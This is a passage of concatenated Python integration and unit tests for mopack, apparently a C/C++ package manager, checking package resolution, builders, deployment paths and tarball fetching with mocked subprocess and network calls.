libraries=[{'name': 'ogg', 'type': 'guess'}]
)
),
cfg_apt_pkg(
'zlib', config,
remote=['zlib1g-dev'],
usage=cfg_system_usage(
pcfile='zlib',
libraries=[{'name': 'zlib', 'type': 'guess'}]
)
),
],
})
self.assertPopen(['mopack', 'deploy'])
```
#### File: test/integration/test_clean_needed.py
```python
import json
import os
from . import *
class TestCleanNeeded(IntegrationTest):
name = 'clean-needed'
def test_resolve(self):
config = os.path.join(test_data_dir, 'mopack-nested-extra.yml')
self.assertPopen(['mopack', 'resolve', config])
self.assertExists('mopack/build/greeter/')
self.assertExists('mopack/build/greeter/extra.txt')
self.assertExists('mopack/logs/greeter.log')
self.assertExists('mopack/build/hello/')
self.assertExists('mopack/build/hello/extra.txt')
self.assertExists('mopack/logs/hello.log')
self.assertExists('mopack/mopack.json')
self.assertPkgConfigUsage('greeter')
self.assertPkgConfigUsage('hello')
output = json.loads(slurp('mopack/mopack.json'))
self.assertEqual(output['metadata'], {
'options': cfg_options(bfg9000={}),
'packages': [
cfg_directory_pkg(
'hello', config,
path={'base': 'cfgdir', 'path': 'hello-bfg'},
builder=cfg_bfg9000_builder(
'hello', extra_args=['--extra']
)
),
cfg_directory_pkg(
'greeter', config,
path={'base': 'cfgdir', 'path': 'greeter-bfg'},
builder=cfg_bfg9000_builder(
'greeter', extra_args=['--extra']
)
),
],
})
# Rebuild with a different config.
config = os.path.join(test_data_dir, 'mopack-nested.yml')
self.assertPopen(['mopack', 'resolve', config])
self.assertExists('mopack/build/greeter/')
self.assertExists('mopack/logs/greeter.log')
self.assertExists('mopack/src/hello/hello-bfg/')
self.assertExists('mopack/build/hello/')
self.assertExists('mopack/logs/hello.log')
self.assertExists('mopack/mopack.json')
self.assertNotExists('mopack/build/greeter/extra.txt')
self.assertNotExists('mopack/build/hello/extra.txt')
self.assertPkgConfigUsage('greeter')
self.assertPkgConfigUsage('hello')
output = json.loads(slurp('mopack/mopack.json'))
self.assertEqual(output['metadata'], {
'options': cfg_options(bfg9000={}),
'packages': [
cfg_tarball_pkg(
'hello',
os.path.join(test_data_dir, 'greeter-bfg', 'mopack.yml'),
parent='greeter',
path={'base': 'cfgdir',
'path': os.path.join('..', 'hello-bfg.tar.gz')},
guessed_srcdir='hello-bfg',
builder=cfg_bfg9000_builder('hello')
),
cfg_directory_pkg(
'greeter', config,
path={'base': 'cfgdir', 'path': 'greeter-bfg'},
builder=cfg_bfg9000_builder('greeter')
),
],
})
```
#### File: test/integration/test_conan.py
```python
import json
import os
from . import *
class TestConan(IntegrationTest):
name = 'conan'
def test_resolve(self):
config = os.path.join(test_data_dir, 'mopack-conan.yml')
self.assertPopen(['mopack', 'resolve', '-Sconan:extra_args=-gtxt',
config])
self.assertExists('mopack/logs/conan.log')
self.assertExists('mopack/conan/conanbuildinfo.txt')
self.assertExists('mopack/mopack.json')
self.assertPkgConfigUsage('zlib', path=[os.path.join(
self.stage, 'mopack', 'conan'
)])
output = json.loads(slurp('mopack/mopack.json'))
self.assertEqual(output['metadata'], {
'options': cfg_options(
conan={'build': ['missing'], 'extra_args': ['-gtxt']}
),
'packages': [
cfg_conan_pkg(
'zlib', config,
remote='zlib/1.2.11',
options={'shared': True},
usage=cfg_pkg_config_usage(
path=[{'base': 'builddir', 'path': ''}],
pcfile='zlib'
)
),
],
})
```
#### File: test/integration/test_custom_builder.py
```python
import json
import os
from mopack.path import pushd
from mopack.platforms import platform_name
from . import *
class TestCustomBuilder(IntegrationTest):
name = 'custom-builder'
def test_resolve(self):
config = os.path.join(test_data_dir, 'mopack-custom-builder.yml')
self.assertPopen(['mopack', 'resolve', config])
self.assertExists('mopack/src/hello/hello-bfg/build.bfg')
self.assertExists('mopack/build/hello/')
self.assertExists('mopack/logs/hello.log')
self.assertExists('mopack/mopack.json')
self.assertPkgConfigUsage('hello')
output = json.loads(slurp('mopack/mopack.json'))
self.assertEqual(output['metadata'], {
'options': cfg_options(),
'packages': [
cfg_tarball_pkg(
'hello', config,
path={'base': 'cfgdir', 'path': 'hello-bfg.tar.gz'},
guessed_srcdir='hello-bfg',
builder=cfg_custom_builder(
'hello',
build_commands=[
['bfg9000', 'configure',
{'base': 'builddir', 'path': ''}],
['cd', [{'base': 'builddir', 'path': ''}, '/.']],
['ninja'],
],
deploy_commands=[
['ninja', 'install'],
],
usage=cfg_pkg_config_usage(pcfile='hello')
)
),
],
})
class TestCustomBuilderDeploy(IntegrationTest):
name = 'custom-builder-deploy'
maxDiff = None
deploy = True
def test_resolve(self):
config = os.path.join(test_data_dir, 'mopack-custom-builder.yml')
self.assertPopen(['mopack', 'resolve', config,
'-Pprefix=' + self.prefix])
self.assertExists('mopack/src/hello/hello-bfg/build.bfg')
self.assertExists('mopack/build/hello/')
self.assertExists('mopack/logs/hello.log')
self.assertExists('mopack/mopack.json')
self.assertPkgConfigUsage('hello')
output = json.loads(slurp('mopack/mopack.json'))
self.assertEqual(output['metadata'], {
'options': cfg_options(
common={'deploy_paths': {'prefix': self.prefix}}
),
'packages': [
cfg_tarball_pkg(
'hello', config,
path={'base': 'cfgdir', 'path': 'hello-bfg.tar.gz'},
guessed_srcdir='hello-bfg',
builder=cfg_custom_builder(
'hello',
build_commands=[
['bfg9000', 'configure',
{'base': 'builddir', 'path': ''},
['--prefix=', {'base': 'absolute',
'path': self.prefix}]],
['cd', [{'base': 'builddir', 'path': ''}, '/.']],
['ninja'],
],
deploy_commands=[
['ninja', 'install'],
],
usage=cfg_pkg_config_usage(pcfile='hello')
)
),
],
})
self.assertPopen(['mopack', '--debug', 'deploy'])
include_prefix = '' if platform_name() == 'windows' else 'include/'
lib_prefix = '' if platform_name() == 'windows' else 'lib/'
with pushd(self.prefix):
self.assertExists(include_prefix + 'hello.hpp')
self.assertExists(lib_prefix + 'pkgconfig/hello.pc')
```
#### File: test/integration/test_invalid.py
```python
import os
from . import *
class TestInvalid(IntegrationTest):
name = 'invalid'
def test_resolve(self):
config = os.path.join(test_data_dir, 'mopack-invalid.yml')
output = self.assertPopen(['mopack', 'resolve', config], returncode=1)
self.assertRegex(output,
r'error: expected an inner path\n' +
r' in ".+mopack-invalid.yml", line 5, column 13\n' +
r' srcdir: \.\./foo\n' +
r' \^\n$')
class TestInvalidChild(IntegrationTest):
name = 'invalid-child'
def test_resolve(self):
config = os.path.join(test_data_dir, 'mopack-invalid-child.yml')
output = self.assertPopen(['mopack', 'resolve', config], returncode=1)
self.assertRegex(output,
r'error: bfg9000 got an unexpected keyword ' +
r"argument 'unknown'\n" +
r' in ".+mopack.yml", line 4, column 5\n' +
r' unknown: blah\n' +
r' \^\n$')
class TestInvalidParent(IntegrationTest):
name = 'invalid-parent'
def test_resolve(self):
config = os.path.join(test_data_dir, 'mopack-invalid-parent.yml')
output = self.assertPopen(['mopack', 'resolve', config], returncode=1)
self.assertRegex(output,
r"error: unknown usage 'unknown'\n" +
r' in ".+mopack-invalid-parent.yml", ' +
r'line 6, column 13\n' +
r' type: unknown\n' +
r' \^\n$')
class TestInvalidConditional(IntegrationTest):
name = 'invalid-conditional'
def test_resolve(self):
config = os.path.join(test_data_dir, 'mopack-invalid-conditional.yml')
output = self.assertPopen(['mopack', 'resolve', config], returncode=1)
self.assertRegex(output,
r"error: undefined symbol 'unknown'\n" +
r' in ".+mopack-invalid-conditional.yml", ' +
r'line 3, column 11\n' +
r' - if: unknown\n' +
r' \^\n$')
class TestInvalidListFiles(IntegrationTest):
name = 'invalid-list-files'
def test_list_files(self):
self.assertOutput(['mopack', 'list-files'], '')
self.assertPopen(['mopack', 'list-files', '--strict'], returncode=1)
```
#### File: test/integration/test_nested.py
```python
import json
import os
import sys
from textwrap import dedent
from mopack.path import pushd
from mopack.platforms import platform_name
from . import *
class TestNested(IntegrationTest):
name = 'nested'
deploy = True
def setUp(self):
super().setUp()
try:
'┼'.encode(sys.stdout.encoding)
self.supports_unicode = True
except UnicodeEncodeError:
self.supports_unicode = False
def test_resolve(self):
config = os.path.join(test_data_dir, 'mopack-nested.yml')
self.assertPopen(['mopack', 'resolve', config,
'-Pprefix=' + self.prefix])
self.assertExists('mopack/build/greeter/')
self.assertExists('mopack/logs/greeter.log')
self.assertExists('mopack/src/hello/hello-bfg/')
self.assertExists('mopack/build/hello/')
self.assertExists('mopack/logs/hello.log')
self.assertExists('mopack/mopack.json')
self.assertPkgConfigUsage('greeter')
self.assertPkgConfigUsage('hello')
output = json.loads(slurp('mopack/mopack.json'))
self.assertEqual(output['metadata'], {
'options': cfg_options(
common={'deploy_paths': {'prefix': self.prefix}},
bfg9000={}
),
'packages': [
cfg_tarball_pkg(
'hello',
os.path.join(test_data_dir, 'greeter-bfg', 'mopack.yml'),
parent='greeter',
path={'base': 'cfgdir',
'path': os.path.join('..', 'hello-bfg.tar.gz')},
guessed_srcdir='hello-bfg',
builder=cfg_bfg9000_builder('hello')
),
cfg_directory_pkg(
'greeter', config,
path={'base': 'cfgdir', 'path': 'greeter-bfg'},
builder=cfg_bfg9000_builder('greeter')
)
],
})
self.assertPopen(['mopack', 'deploy'])
include_prefix = '' if platform_name() == 'windows' else 'include/'
lib_prefix = '' if platform_name() == 'windows' else 'lib/'
with pushd(self.prefix):
self.assertExists(include_prefix + 'greeter.hpp')
self.assertExists(lib_prefix + 'pkgconfig/greeter.pc')
self.assertExists(include_prefix + 'hello.hpp')
self.assertExists(lib_prefix + 'pkgconfig/hello.pc')
if self.supports_unicode:
self.assertOutput(['mopack', 'list-packages'], dedent("""\
└─ greeter 1.0 (directory)
└─ hello 1.0 (tarball)
"""))
else:
self.assertOutput(['mopack', 'list-packages'], dedent("""\
+- greeter 1.0 (directory)
+- hello 1.0 (tarball)
"""))
self.assertOutput(['mopack', 'list-packages', '--flat'],
'hello 1.0 (tarball)\ngreeter 1.0 (directory)\n')
def test_resolve_extra(self):
config = os.path.join(test_data_dir, 'mopack-nested-extra.yml')
self.assertPopen(['mopack', 'resolve', config,
'-Pprefix=' + self.prefix])
self.assertExists('mopack/build/greeter/')
self.assertExists('mopack/logs/greeter.log')
self.assertNotExists('mopack/src/hello/hello-bfg/')
self.assertExists('mopack/build/hello/')
self.assertExists('mopack/logs/hello.log')
self.assertExists('mopack/mopack.json')
self.assertPkgConfigUsage('greeter')
self.assertPkgConfigUsage('hello')
output = json.loads(slurp('mopack/mopack.json'))
self.assertEqual(output['metadata'], {
'options': cfg_options(
common={'deploy_paths': {'prefix': self.prefix}},
bfg9000={}
),
'packages': [
cfg_directory_pkg(
'hello', config,
path={'base': 'cfgdir', 'path': 'hello-bfg'},
builder=cfg_bfg9000_builder(
'hello', extra_args=['--extra']
)
),
cfg_directory_pkg(
'greeter', config,
path={'base': 'cfgdir', 'path': 'greeter-bfg'},
builder=cfg_bfg9000_builder(
'greeter', extra_args=['--extra']
)
)
],
})
self.assertPopen(['mopack', 'deploy'])
include_prefix = '' if platform_name() == 'windows' else 'include/'
lib_prefix = '' if platform_name() == 'windows' else 'lib/'
with pushd(self.prefix):
self.assertExists(include_prefix + 'greeter.hpp')
self.assertExists(lib_prefix + 'pkgconfig/greeter.pc')
self.assertExists(include_prefix + 'hello.hpp')
self.assertExists(lib_prefix + 'pkgconfig/hello.pc')
if self.supports_unicode:
self.assertOutput(['mopack', 'list-packages'], dedent("""\
├─ hello 1.0 (directory)
└─ greeter 1.0 (directory)
"""))
else:
self.assertOutput(['mopack', 'list-packages'], dedent("""\
+- hello 1.0 (directory)
+- greeter 1.0 (directory)
"""))
self.assertOutput(['mopack', 'list-packages', '--flat'],
'hello 1.0 (directory)\ngreeter 1.0 (directory)\n')
```
#### File: unit/builders/test_builders.py
```python
from . import BuilderTest
from mopack.builders import make_builder
from mopack.builders.bfg9000 import Bfg9000Builder
from mopack.types import FieldError
class TestMakeBuilder(BuilderTest):
def test_make(self):
builder = make_builder('foo', {'type': 'bfg9000'}, submodules=None,
_options=self.make_options())
self.assertIsInstance(builder, Bfg9000Builder)
self.assertEqual(builder.name, 'foo')
def test_make_string(self):
builder = make_builder('foo', 'bfg9000', submodules=None,
_options=self.make_options())
self.assertIsInstance(builder, Bfg9000Builder)
self.assertEqual(builder.name, 'foo')
def test_unknown_builder(self):
self.assertRaises(FieldError, make_builder, 'foo', {'type': 'goofy'},
submodules=None, _options=self.make_options())
def test_invalid_keys(self):
self.assertRaises(TypeError, make_builder, 'foo',
{'type': 'bfg9000', 'unknown': 'blah'},
submodules=None, _options=self.make_options())
def test_invalid_values(self):
self.assertRaises(FieldError, make_builder, 'foo',
{'type': 'bfg9000', 'extra_args': 1},
submodules=None, _options=self.make_options())
```
#### File: unit/builders/test_none.py
```python
import os
from unittest import mock
from . import BuilderTest, MockPackage, through_json
from mopack.builders import Builder
from mopack.builders.none import NoneBuilder
from mopack.iterutils import iterate
from mopack.usage.pkg_config import PkgConfigUsage
class TestNoneBuilder(BuilderTest):
builder_type = NoneBuilder
path_bases = ('srcdir',)
def pkgconfdir(self, name, pkgconfig='pkgconfig'):
return os.path.join(self.srcdir, pkgconfig)
def check_build(self, builder, extra_args=[], *, submodules=None,
usage=None):
if usage is None:
pcfiles = ['foo']
pcfiles.extend('foo_{}'.format(i) for i in iterate(submodules))
usage = {'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo')], 'pcfiles': pcfiles,
'extra_args': []}
with mock.patch('subprocess.run') as mcall:
builder.build(self.pkgdir, self.srcdir)
mcall.assert_not_called()
self.assertEqual(builder.get_usage(
MockPackage(), submodules, self.pkgdir, self.srcdir
), usage)
def test_basic(self):
builder = self.make_builder('foo', usage='pkg_config')
self.assertEqual(builder.name, 'foo')
self.assertEqual(builder.usage, PkgConfigUsage(
'foo', submodules=None, _options=self.make_options(),
_path_bases=self.path_bases
))
self.check_build(builder)
with mock.patch('subprocess.run') as mcall:
builder.deploy(self.pkgdir, self.srcdir)
mcall.assert_not_called()
def test_usage_full(self):
usage = {'type': 'pkg_config', 'path': 'pkgconf'}
builder = self.make_builder('foo', usage=usage)
self.assertEqual(builder.name, 'foo')
self.assertEqual(builder.usage, PkgConfigUsage(
'foo', path='pkgconf', submodules=None,
_options=self.make_options(), _path_bases=self.path_bases
))
self.check_build(builder, usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo', 'pkgconf')], 'pcfiles': ['foo'],
'extra_args': [],
})
def test_submodules(self):
submodules_required = {'names': '*', 'required': True}
submodules_optional = {'names': '*', 'required': False}
builder = self.make_builder('foo', usage='pkg_config',
submodules=submodules_required)
self.check_build(builder, submodules=['sub'], usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo')], 'pcfiles': ['foo_sub'],
'extra_args': [],
})
builder = self.make_builder(
'foo', usage={'type': 'pkg_config', 'pcfile': 'bar'},
submodules=submodules_required
)
self.check_build(builder, submodules=['sub'], usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo')], 'pcfiles': ['bar', 'foo_sub'],
'extra_args': [],
})
builder = self.make_builder('foo', usage='pkg_config',
submodules=submodules_optional)
self.check_build(builder, submodules=['sub'])
builder = self.make_builder(
'foo', usage={'type': 'pkg_config', 'pcfile': 'bar'},
submodules=submodules_optional
)
self.check_build(builder, submodules=['sub'], usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo')], 'pcfiles': ['bar', 'foo_sub'],
'extra_args': [],
})
def test_clean(self):
builder = self.make_builder('foo', usage='pkg_config')
with mock.patch('shutil.rmtree') as mrmtree:
builder.clean(self.pkgdir)
mrmtree.assert_not_called()
def test_rehydrate(self):
opts = self.make_options()
builder = NoneBuilder('foo', submodules=None, _options=opts)
builder.set_usage({'type': 'pkg_config', 'path': 'pkgconf'},
submodules=None)
data = through_json(builder.dehydrate())
self.assertEqual(builder, Builder.rehydrate(data, _options=opts))
def test_upgrade(self):
opts = self.make_options()
data = {'type': 'none', '_version': 0, 'name': 'foo',
'usage': {'type': 'system', '_version': 0}}
with mock.patch.object(NoneBuilder, 'upgrade',
side_effect=NoneBuilder.upgrade) as m:
pkg = Builder.rehydrate(data, _options=opts)
self.assertIsInstance(pkg, NoneBuilder)
m.assert_called_once()
```
#### File: unit/sources/__init__.py
```python
from .. import OptionsTest, through_json # noqa: F401
class SourceTest(OptionsTest):
def make_options(self, pkg_type=None, *, common_options=None,
this_options=None, deploy_paths=None, config_file=None):
options = super().make_options(common_options, deploy_paths)
if this_options:
source = (pkg_type or self.pkg_type).source
options.sources[source].accumulate(
this_options, _symbols=options.expr_symbols,
config_file=config_file or self.config_file
)
return options
def make_package(self, *args, common_options=None, this_options=None,
deploy_paths=None, **kwargs):
if len(args) == 1:
pkg_type = self.pkg_type
name = args[0]
else:
pkg_type, name = args
kwargs.setdefault('config_file', self.config_file)
opts = self.make_options(pkg_type, common_options=common_options,
this_options=this_options,
deploy_paths=deploy_paths)
return pkg_type(name, _options=opts, **kwargs)
```
#### File: sources/sdist/test_tarball.py
```python
import os
import subprocess
from unittest import mock
from . import *
from .... import *
from mopack.builders.bfg9000 import Bfg9000Builder
from mopack.config import Config
from mopack.path import Path
from mopack.sources import Package
from mopack.sources.apt import AptPackage
from mopack.sources.sdist import TarballPackage
from mopack.types import ConfigurationError
def mock_exists(p):
return os.path.basename(p) == 'mopack.yml'
class TestTarball(SDistTestCase):
pkg_type = TarballPackage
srcurl = 'http://example.invalid/hello-bfg.tar.gz'
srcpath = os.path.join(test_data_dir, 'hello-bfg.tar.gz')
def setUp(self):
self.config = Config([])
def mock_urlopen(self, url):
return open(self.srcpath, 'rb')
def check_fetch(self, pkg):
srcdir = os.path.join(self.pkgdir, 'src', 'foo')
with mock.patch('mopack.sources.sdist.urlopen', self.mock_urlopen), \
mock.patch('tarfile.TarFile.extractall') as mtar, \
mock.patch('os.path.isdir', return_value=True), \
mock.patch('os.path.exists', return_value=False): # noqa
pkg.fetch(self.config, self.pkgdir)
mtar.assert_called_once_with(srcdir, None)
def test_url(self):
pkg = self.make_package('foo', url=self.srcurl, build='bfg9000')
self.assertEqual(pkg.url, self.srcurl)
self.assertEqual(pkg.path, None)
self.assertEqual(pkg.patch, None)
self.assertEqual(pkg.builder, self.make_builder(Bfg9000Builder, 'foo'))
self.assertEqual(pkg.needs_dependencies, True)
self.assertEqual(pkg.should_deploy, True)
self.check_fetch(pkg)
self.check_resolve(pkg)
def test_path(self):
pkg = self.make_package('foo', path=self.srcpath, build='bfg9000')
self.assertEqual(pkg.url, None)
self.assertEqual(pkg.path, Path(self.srcpath))
self.assertEqual(pkg.patch, None)
self.assertEqual(pkg.builder, self.make_builder(Bfg9000Builder, 'foo'))
self.assertEqual(pkg.needs_dependencies, True)
self.assertEqual(pkg.should_deploy, True)
self.check_fetch(pkg)
self.check_resolve(pkg)
def test_zip_path(self):
srcpath = os.path.join(test_data_dir, 'hello-bfg.zip')
pkg = self.make_package('foo', build='bfg9000', path=srcpath)
self.assertEqual(pkg.url, None)
self.assertEqual(pkg.path, Path(srcpath))
self.assertEqual(pkg.builder, self.make_builder(Bfg9000Builder, 'foo'))
self.assertEqual(pkg.needs_dependencies, True)
self.assertEqual(pkg.should_deploy, True)
srcdir = os.path.join(self.pkgdir, 'src', 'foo')
with mock.patch('mopack.sources.sdist.urlopen', self.mock_urlopen), \
mock.patch('zipfile.ZipFile.extractall') as mtar, \
mock.patch('os.path.isdir', return_value=True), \
mock.patch('os.path.exists', return_value=False): # noqa
pkg.fetch(self.config, self.pkgdir)
mtar.assert_called_once_with(srcdir, None)
self.check_resolve(pkg)
def test_invalid_url_path(self):
with self.assertRaises(TypeError):
self.make_package('foo', build='bfg9000')
with self.assertRaises(TypeError):
self.make_package('foo', url=self.srcurl, path=self.srcpath,
build='bfg9000')
def test_files(self):
pkg = self.make_package('foo', path=self.srcpath,
files='/hello-bfg/include/', build='bfg9000')
self.assertEqual(pkg.files, ['/hello-bfg/include/'])
srcdir = os.path.join(self.pkgdir, 'src', 'foo')
with mock.patch('mopack.sources.sdist.urlopen', self.mock_urlopen), \
mock.patch('tarfile.TarFile.extract') as mtar, \
mock.patch('os.path.isdir', return_value=True), \
mock.patch('os.path.exists', return_value=False): # noqa
pkg.fetch(self.config, self.pkgdir)
self.assertEqual(mtar.mock_calls, [
mock.call('hello-bfg/include', srcdir),
mock.call('hello-bfg/include/hello.hpp', srcdir),
])
self.check_resolve(pkg)
def test_patch(self):
patch = os.path.join(test_data_dir, 'hello-bfg.patch')
pkg = self.make_package('foo', path=self.srcpath, patch=patch,
build='bfg9000')
self.assertEqual(pkg.patch, Path(patch))
srcdir = os.path.join(self.pkgdir, 'src', 'foo')
with mock.patch('mopack.sources.sdist.urlopen', self.mock_urlopen), \
mock.patch('mopack.sources.sdist.pushd'), \
mock.patch('tarfile.TarFile.extractall') as mtar, \
mock.patch('os.path.isdir', return_value=True), \
mock.patch('os.path.exists', return_value=False), \
mock.patch('builtins.open', mock_open_after_first()) as mopen, \
mock.patch('os.makedirs'), \
mock.patch('subprocess.run') as mrun: # noqa
pkg.fetch(self.config, self.pkgdir)
mtar.assert_called_once_with(srcdir, None)
mrun.assert_called_once_with(
['patch', '-p1'], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, stdin=mopen(),
universal_newlines=True, check=True
)
self.check_resolve(pkg)
def test_build(self):
build = {'type': 'bfg9000', 'extra_args': '--extra'}
pkg = self.make_package('foo', path=self.srcpath, build=build,
usage='pkg_config')
self.assertEqual(pkg.path, Path(self.srcpath))
self.assertEqual(pkg.builder, self.make_builder(
Bfg9000Builder, 'foo', extra_args='--extra'
))
self.check_fetch(pkg)
self.check_resolve(pkg)
def test_infer_build(self):
# Basic inference
pkg = self.make_package('foo', path=self.srcpath)
self.assertEqual(pkg.builder, None)
with mock.patch('os.path.exists', mock_exists), \
mock.patch('builtins.open', mock_open_after_first(
read_data='export:\n build: bfg9000'
)), \
mock.patch('tarfile.TarFile.extractall'): # noqa
config = pkg.fetch(self.config, self.pkgdir)
self.assertEqual(config.export.build, 'bfg9000')
self.assertEqual(pkg, self.make_package(
'foo', path=self.srcpath, build='bfg9000'
))
self.check_resolve(pkg)
# Infer but override usage and version
pkg = self.make_package('foo', path=self.srcpath,
usage={'type': 'system'})
self.assertEqual(pkg.builder, None)
with mock.patch('os.path.exists', mock_exists), \
mock.patch('builtins.open', mock_open_after_first(
read_data='export:\n build: bfg9000'
)), \
mock.patch('tarfile.TarFile.extractall'): # noqa
config = pkg.fetch(self.config, self.pkgdir)
self.assertEqual(config.export.build, 'bfg9000')
self.assertEqual(pkg, self.make_package(
'foo', path=self.srcpath, build='bfg9000',
usage={'type': 'system'}
))
with mock.patch('subprocess.run', side_effect=OSError()), \
mock.patch('mopack.usage.path_system.PathUsage._filter_path',
lambda *args: []), \
mock.patch('mopack.usage.path_system.file_outdated',
return_value=True), \
mock.patch('os.makedirs'), \
mock.patch('builtins.open'): # noqa
self.check_resolve(pkg, usage={
'name': 'foo', 'type': 'system',
'path': [self.pkgconfdir(None)], 'pcfiles': ['foo'],
'generated': True, 'auto_link': False,
})
def test_infer_build_override(self):
pkg = self.make_package('foo', path=self.srcpath, build='cmake',
usage='pkg_config')
with mock.patch('os.path.exists', mock_exists), \
mock.patch('builtins.open', mock_open_after_first(
read_data='export:\n build: bfg9000'
)), \
mock.patch('tarfile.TarFile.extractall'): # noqa
config = pkg.fetch(self.config, self.pkgdir)
self.assertEqual(config.export.build, 'bfg9000')
self.assertEqual(pkg, self.make_package(
'foo', path=self.srcpath, build='cmake', usage='pkg_config'
))
with mock.patch('mopack.builders.cmake.pushd'):
self.check_resolve(pkg)
def test_usage(self):
pkg = self.make_package('foo', path=self.srcpath, build='bfg9000',
usage='pkg_config')
self.assertEqual(pkg.path, Path(self.srcpath))
self.assertEqual(pkg.builder, self.make_builder(
Bfg9000Builder, 'foo', usage='pkg_config'
))
self.check_fetch(pkg)
self.check_resolve(pkg)
with mock.patch('subprocess.run') as mrun:
pkg.version(self.pkgdir)
mrun.assert_called_once_with(
['pkg-config', 'foo', '--modversion'],
check=True, env={'PKG_CONFIG_PATH': self.pkgconfdir('foo')},
stdout=subprocess.PIPE, universal_newlines=True
)
usage = {'type': 'pkg_config', 'path': 'pkgconf'}
pkg = self.make_package('foo', path=self.srcpath, build='bfg9000',
usage=usage)
self.assertEqual(pkg.path, Path(self.srcpath))
self.assertEqual(pkg.builder, self.make_builder(
Bfg9000Builder, 'foo', usage=usage
))
self.check_fetch(pkg)
self.check_resolve(pkg, usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo', 'pkgconf')], 'pcfiles': ['foo'],
'extra_args': [],
})
usage = {'type': 'path', 'libraries': []}
pkg = self.make_package('foo', path=self.srcpath, build='bfg9000',
usage=usage)
self.assertEqual(pkg.path, Path(self.srcpath))
self.assertEqual(pkg.builder, self.make_builder(
Bfg9000Builder, 'foo', usage=usage
))
self.check_fetch(pkg)
self.check_resolve(pkg, usage={
'name': 'foo', 'type': 'path', 'path': [self.pkgconfdir(None)],
'pcfiles': ['foo'], 'generated': True, 'auto_link': False,
})
with mock.patch('subprocess.run') as mrun:
self.assertEqual(pkg.version(self.pkgdir), None)
mrun.assert_not_called()
def test_submodules(self):
submodules_required = {'names': '*', 'required': True}
submodules_optional = {'names': '*', 'required': False}
pkg = self.make_package('foo', path=self.srcpath, build='bfg9000',
submodules=submodules_required)
self.check_fetch(pkg)
self.check_resolve(pkg, submodules=['sub'])
pkg = self.make_package('foo', path=self.srcpath, build='bfg9000',
usage={'type': 'pkg_config', 'pcfile': 'bar'},
submodules=submodules_required)
self.check_fetch(pkg)
self.check_resolve(pkg, submodules=['sub'], usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo')], 'pcfiles': ['bar', 'foo_sub'],
'extra_args': [],
})
pkg = self.make_package('foo', path=self.srcpath, build='bfg9000',
submodules=submodules_optional)
self.check_fetch(pkg)
self.check_resolve(pkg, submodules=['sub'])
pkg = self.make_package('foo', path=self.srcpath, build='bfg9000',
usage={'type': 'pkg_config', 'pcfile': 'bar'},
submodules=submodules_optional)
self.check_fetch(pkg)
self.check_resolve(pkg, submodules=['sub'], usage={
'name': 'foo', 'type': 'pkg_config',
'path': [self.pkgconfdir('foo')], 'pcfiles': ['bar', 'foo_sub'],
'extra_args': [],
})
def test_invalid_submodule(self):
pkg = self.make_package(
'foo', path=self.srcpath, build='bfg9000',
submodules={'names': ['sub'], 'required': True}
)
with self.assertRaises(ValueError):
pkg.get_usage(self.pkgdir, ['invalid'])
def test_already_fetched(self):
def mock_exists(p):
return os.path.basename(p) == 'foo'
build = {'type': 'bfg9000', 'extra_args': '--extra'}
pkg = self.make_package('foo', path=self.srcpath, srcdir='srcdir',
build=build, usage='pkg_config')
with mock.patch('os.path.exists', mock_exists), \
mock.patch('tarfile.TarFile.extractall') as mtar, \
mock.patch('os.path.isdir', return_value=True): # noqa
pkg.fetch(self.config, self.pkgdir)
mtar.assert_not_called()
self.check_resolve(pkg)
def test_deploy(self):
deploy_paths = {'prefix': '/usr/local'}
pkg = self.make_package('foo', url=self.srcurl, build='bfg9000',
deploy_paths=deploy_paths)
self.assertEqual(pkg.should_deploy, True)
self.check_fetch(pkg)
with mock_open_log() as mopen, \
mock.patch('mopack.builders.bfg9000.pushd'), \
mock.patch('subprocess.run') as mrun: # noqa
pkg.resolve(self.pkgdir)
mopen.assert_called_with(os.path.join(
self.pkgdir, 'logs', 'foo.log'
), 'a')
builddir = os.path.join(self.pkgdir, 'build', 'foo')
mrun.assert_any_call(
['bfg9000', 'configure', builddir, '--prefix', '/usr/local'],
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
universal_newlines=True, check=True
)
with mock_open_log() as mopen, \
mock.patch('mopack.builders.bfg9000.pushd'), \
mock.patch('subprocess.run'): # noqa
pkg.deploy(self.pkgdir)
mopen.assert_called_with(os.path.join(
self.pkgdir, 'logs', 'deploy', 'foo.log'
), 'a')
pkg = self.make_package('foo', url='http://example.com',
build='bfg9000', deploy=False)
self.assertEqual(pkg.should_deploy, False)
with mock_open_log() as mopen:
pkg.deploy(self.pkgdir)
mopen.assert_not_called()
def test_clean_pre(self):
otherpath = os.path.join(test_data_dir, 'other_project.tar.gz')
oldpkg = self.make_package('foo', path=self.srcpath,
srcdir='bfg_project', build='bfg9000')
newpkg1 = self.make_package('foo', path=otherpath, build='bfg9000')
newpkg2 = self.make_package(AptPackage, 'foo')
srcdir = os.path.join(self.pkgdir, 'src', 'foo')
# Tarball -> Tarball (same)
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('shutil.rmtree') as mrmtree: # noqa
self.assertEqual(oldpkg.clean_pre(oldpkg, self.pkgdir), False)
mlog.assert_not_called()
mrmtree.assert_not_called()
# Tarball -> Tarball (different)
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('shutil.rmtree') as mrmtree: # noqa
self.assertEqual(oldpkg.clean_pre(newpkg1, self.pkgdir), True)
mlog.assert_called_once()
mrmtree.assert_called_once_with(srcdir, ignore_errors=True)
# Tarball -> Apt
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('shutil.rmtree') as mrmtree: # noqa
self.assertEqual(oldpkg.clean_pre(newpkg2, self.pkgdir), True)
mlog.assert_called_once()
mrmtree.assert_called_once_with(srcdir, ignore_errors=True)
# Tarball -> nothing
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('shutil.rmtree') as mrmtree: # noqa
self.assertEqual(oldpkg.clean_pre(None, self.pkgdir), True)
mlog.assert_called_once()
mrmtree.assert_called_once_with(srcdir, ignore_errors=True)
# Tarball -> nothing (quiet)
with mock.patch('mopack.log.pkg_clean') as mlog, \
mock.patch('shutil.rmtree') as mrmtree: # noqa
